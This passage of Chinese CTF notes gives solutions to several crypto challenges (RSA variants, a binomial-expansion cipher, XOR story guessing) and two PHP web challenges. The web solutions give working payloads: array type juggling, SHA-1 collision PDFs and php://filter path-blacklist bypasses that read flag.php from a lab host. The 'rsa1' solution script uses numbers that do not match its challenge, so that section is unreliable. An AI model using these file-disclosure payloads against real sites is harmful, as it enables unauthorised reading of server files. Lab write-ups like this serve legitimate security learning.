247512597006126883635090340753475080689838573417741101697005667509804117477078714343224837766971175288554228364175312803060405952234277289653353821049167680289322424370730116331485806992442330752262754657170209301796826520903516939270541484630918051998431104746567068050303837266511857593664457675203874622377426656951134697321668662464768461125119491757074002358277630438779981831394788463952738787381176350532134825112678994090733193226361777537532269515922485937976349665991399772388721397960468392351155664481353730638831836994949983037350384382753327305729403941493686341892251753278811372338966651828844911034352886809190060883995056847456555950315611326987545276629529435068813158170690823902054787362572088738335891773343913632258874832438998334332913261810760087047758552754566575308536675397251987093487164542963055804002441751864022715424662848335470359948420027756835213050500577294799638589135949755879898985814242501638839907383377834819866500082619067419468232672548637154121177897443704368253245514204975147693342503301921844252239673318375741456151277008424086433210309669337358030499431697081307189511178107489812792122478536534259554160073644974772253911579253927334216606449192146737795612311912838169178570116934403812068138348378295739329366212651044519758844001
d=invert(e,(p-1))
print(long_to_bytes(pow(c,d,p)))

##warm up (asisctf Binned)

题目：

from Crypto.Util.number import *
from gensafeprime import *
from flag import flag

def keygen(nbit):
	p, q = [generate(nbit) for _ in range(2)]
	return (p, q)

def encrypt(m, pubkey):
	return pow(pubkey + 1, m, pubkey ** 3)

p, q = keygen(512)
n = p * q

flag = bytes_to_long(flag)
enc = encrypt(flag, n)

print(f'pubkey = {n}')
print(f'enc = {enc}')
 

题目很简短：

enc = pubkey^m^ (mod pubkey^3^)

求解m

wp 将二项式展开得到的是最后三项的和模上pubkek^3^ 可以化成最后两项的和模上 pubkey^2^

wp (n+1)^k^ = kn+1 mod(n^2^)

所以 题解代码为：

pubkey = 125004899806380680278294077957993138206121343727674199724251084023100054797391533591150992663742497532376954423241741439218367086541339504325939051995057848301514908377941815605487168789148131591458301036686411659334843972203243490288676763861925647147178902977362125434420265824374952540259396010995154324589
enc = 789849126571263315208956108629196540107771075292285804732934458641661099043398300667318883764744131397353851782194467024270666326116745519739176492710750437625345677766980300328542459318943175684941281413218985938348407537978884988013947538034827562329111515306723274989323212194585378159386585826998838542734955059450048745917640814983343040930383529332576453845724747105810109832978045135562492851617884175410194781236450629682032219153517122695586503298477875749138129517477339813480115293124316913331705913455692462482942654717828006590051944205639923326375814299624264826939725890226430388059890231323791398412019416647826367964048142887158552454494856771139750458462334678907791079639005383932256589768726730285409763583606927779418528562990619985840033479201147509241313757191997545174262930707521451438204766627975109619779824255444258160
import sympy
import gmpy2
from Crypto.Util.number import *
print(long_to_bytes((enc-1)%pubkey**2//pubkey))
#ASIS{8!N0miaL_3XpAn5iOn_Us4G3_1N_cRyp7o_9rApHy!}

猜异或

题目：

# I want to tell you an interesting English little story!

flag = ?
story = ?
BLOCK_LENGTH = 40

assert len(flag) == BLOCK_LENGTH
assert flag[:6] == "SKSEC{"

def block_xor(tmp1, tmp2):
    assert len(tmp1) == len(tmp2)
    return "".join(hex(ord(tmp1[i]) ^ ord(tmp2[i]))[2:].zfill(2) for i in range(BLOCK_LENGTH))


for i in range(8):
    storyblock = story[i * BLOCK_LENGTH : (i + 1) * BLOCK_LENGTH]
    print(block_xor(storyblock, flag))


"""
Hey, due to length issues, not all of my English short stories were included in this encryption operation, so I will give you the remaining little tail so that you can obtain a complete English short story by decrypting it. Haha ~
The remaining part is: ……g is so long.
"""

题目意思很简单：就是拿一篇小短文（每次取40个长度）与flag进行异或，已知flag前面的6位”SKSEC{“可以通过异或得到story的前六位，再根据前六位进行猜测；

from libnum import *
from Crypto.Util.number import *
a = [
    0x1c253020630f5e0144544643515e17554100415d5a0203192d0a000d50584b18435b565a1059075d
    , 0x242a2065341a5a0f5f5f0118104552141216484444034919160c000d5c5c535c145c55144459075d
    , 0x2027362033125803165509531e0d635c0442495b53464f58100f0049145f5d4a1452134358580e18
    , 0x7d6b072d265b54085f5f02145d4c59141607434014094319040b170d59505e5d471f13405858115d
    , 0x27223e20631353444545034440485314150a48145b12455c10440142531e411840525a581c111112
    , 0x733f3b2c305b520b51110455424652504f42795c51464f550b0a010d59585c185c52571444590d08
    , 0x342327653713571016581214474c4414150a4814520f5f4a164401425315124b5b135b5110420314
    , 0x376b3a2b6308431646430f475503177d15455e1455465a560c00005f144d5a594013475c55110612]

    # print(a[i][0:7]^flag)
s_3="sleeping"
x=""
story_3=0x2027362033125803165509531e0d635c0442495b53464f58100f0049145f5d4a1452134358580e18
for i in range(len(s_3)):
    z=n2s(story_3)
    x+=chr(ord(z[i])^ord(s_3[i]))
print(x)
flag="SKSEC{6d61f40-74ab-44f-9bde-492843"
story=""
b=b""
for i in range(len(a)):
    b=n2s(a[i])
    for j in range(len(flag)):
        story+=chr(ord(b[j])^ord(flag[j]))
    print("\n")
    print(story)
    story=""

s_8="sleeping dog. The dog barked for a while"
x=""
story_8=0x2027362033125803165509531e0d635c0442495b53464f58100f0049145f5d4a1452134358580e18
for i in range(len(s_8)):
    z=n2s(story_8)
    x+=chr(ord(z[i])^ord(s_8[i]))
print(x)
#最终拿下！SKSEC{6d61f40-74ab-44f-9bde-4928433401b}

#校赛

##web

###easyheader

Payload:http://192.168.88.132:23456/html/flagg.php?a[]=1&b[]=2POST:c=1024.9a&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&e=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1Cookie:name=php://filter/convert.base64-encode/resource=flag

flag{0h_y0u_f1nd_mE}

###array_filter

源码：

​

​

​

​

​

Traversaller

    <p>To view the source code, <a href="/?source">click here.</a>

    <script src="/?path=/var/www/html/static/flag.js"></script>

​

简而言之，传入一个path参数，如果包含array(“\0”,”\r”,”\n”,”\t”,”\x0B”,’..’,’./‘,’.\‘,’//‘,’\\‘,)这些会被删除，但是只会删除一次

并且需要包含/var/www/html/static/字段

最终需要利用die(file_get_contents(sanitize_path($path)));进行文件包含

用伪协议php://filter/

注意黑名单数组顺序，用/\\/即可绕过出//

最终payload

path=php:/\\/filter/read=/var/www/html/static/convert.base64-encode/resource=/var/www/html/flag.php

删除是按照数组顺序来的

所以//前面的都无法用来绕过，只有\\可以

flag{p1EaSe_d0Nt_hAck_M3}

crypto

rsa1

题目描述

import libnum
import uuid
flag = "flag{" + str(uuid.uuid4())+ "}"
m=libnum.s2n(flag)
p=libnum.generate_prime(512)
q=libnum.generate_prime(512)
n=p*q
x=pow(m,p,n)
y=pow(m,q,n)
print("n=",n)
print("x=",x)
print("y=",y)
print(flag)
#n= 108726250463986629030376460709100424740961558063705043991188555053406097511855597252928138692977675232403931689899224046219494012232310630729226940029891976608527066921433628267211955616721907907602395613021189622005781539605597932703800192921805546134866666726991311911392611098503073201705180348845530266571
#x= 49198183590798436760818106933487764933423454546230606813323010197082136947122356778565082963804219161932169174522470406613802480895717535605568250649599703932554686052264831025847714432658079017607131952683929399832199970882720688091555322114966249311429997745758659322419573406489260763604268103549653394422
#y= 86029677741024925841693804631582377773590987100798904638113426384256681535647041667312034736873538051947859778874090872018646668255951479067172105958804793884796390372666384709268830040784599678950693918930373919890059331830680649070165416891207794569285992110186622117292610921866771797865811431469423565899

# sage
 
from Crypto.Util.number import *
n = 128205304743751985889679351195836799434324346996129753896234917982647254577214018524580290192396070591032007818847697193260130051396080104704981594190602854241936777324431673564677900773992273463534717009587530152480725448774018550562603894883079711995434332008363470321069097619786793617099517770260029108149
c1 = 96860654235275202217368130195089839608037558388884522737500611121271571335123981588807994043800468529002147570655597610639680977780779494880330669466389788497046710319213376228391138021976388925171307760030058456934898771589435836261317283743951614505136840364638706914424433566782044926111639955612412134198
c2 = 9566853166416448316408476072940703716510748416699965603380497338943730666656667456274146023583837768495637484138572090891246105018219222267465595710692705776272469703739932909158740030049375350999465338363044226512016686534246611049299981674236577960786526527933966681954486377462298197949323271904405241585
sum = c1 + c2
mult = c1 * c2
PR.<x> = PolynomialRing(Zmod(n))
# R.<x> = PolynomialRing(Zmod(n),implementation = 'NTL')
# R.<x> = Zmod(n)[]
# 上面三个都行
f = x ^ 2 + mult - sum * x
flag = f.small_roots(X = 2 ^ 400)[0] # 2 ^ 400是根的上界
print(flag)
# print(long_to_bytes(flag)
flag = 4242839043019782000788118887372132807371568279472499477998758466224002905442227156537788110520335652385855
print(long_to_bytes(flag))

rsa2

from Crypto.Util.number import *
m=bytes_to_long(b'flag{xxxx}')
p=getPrime(256)
q=getPrime(256)
e=82
n=p*q
c=pow(m,e,n)
print("p=",p)
print("q=",q)
print("c=",c)
#p= 91686771355171145620588413272399939428036500007340744736515940163392268784023
#q= 63046750653623271876604042159153167325179138907881554669424826838768231822353
#c= 3176754573105693892994121501320717262971348612659251860282088610894662481991802778945065772834171665333055506972395043467252560405710280975900033851610324

题解：

from Crypto.Util.number import *
p= 91686771355171145620588413272399939428036500007340744736515940163392268784023
q= 63046750653623271876604042159153167325179138907881554669424826838768231822353
c= 3176754573105693892994121501320717262971348612659251860282088610894662481991802778945065772834171665333055506972395043467252560405710280975900033851610324
from gmpy2 import*
d=invert(41,(p-1)*(q-1))
flag=pow(c,d,p*q)
flag_T=iroot(flag,2)
print(flag_T[0])
print(long_to_bytes(flag_T[0]))

rsa3

题目描述：

from Crypto.Util.number import *
from flag import m

p = getPrime(1024)
q = getPrime(1024)
n = p * q
print('n =',n)
e = 0x10001
M = m * e * 7 * 2023 * p
c = pow(M,e,n)
print('c =',c)

题解：

from Crypto.Util.number import *

e=0x10001
n = 18579244108633609272197536687581864241385184103675010066881354847885555427456021821562179092155235794852240645799299893876070382598504787967889041937460108652315214875841605265309372235059389142538009918152767999607651987735353846565650842749375122533655921766003101652909396306123355858248383800751190056096291004523615150300835194138387131051991385294339066601909735980046614187993826669813120340014347990305114570945745468251265100797355120571150474891943088306290171994436494667877080243386184532504347903256418949528792010548896007742811596240395271614436990784937307678970826707276226909030794894540072015357167
c = 3216292063694048818649410097957823309992659996316217352122696680682114250955570408016854334093895055073184725747062255978133097669119277089893026689131587928257264329947169860972190813702308551156799589015783984132790340496456624201245984611954680325819921163219427121143341574552894601531986580662698829064508434929235349098873310736895291639294011096738485193031885498895385616630472102997766863428013705230294630272846005340747737138798468967106375872905959228079108315253791969118060671994840170733504896971046285852223417768369379308703839779124349732242977815320441650254598759078620160139596799879779113900706
from gmpy2 import *
p=gcd(c,n)
q=n//p
d=invert(e,(p-1)*(q-1))
print(long_to_bytes(pow(c,d,p*q)//(e * 7 * 2023 * p)))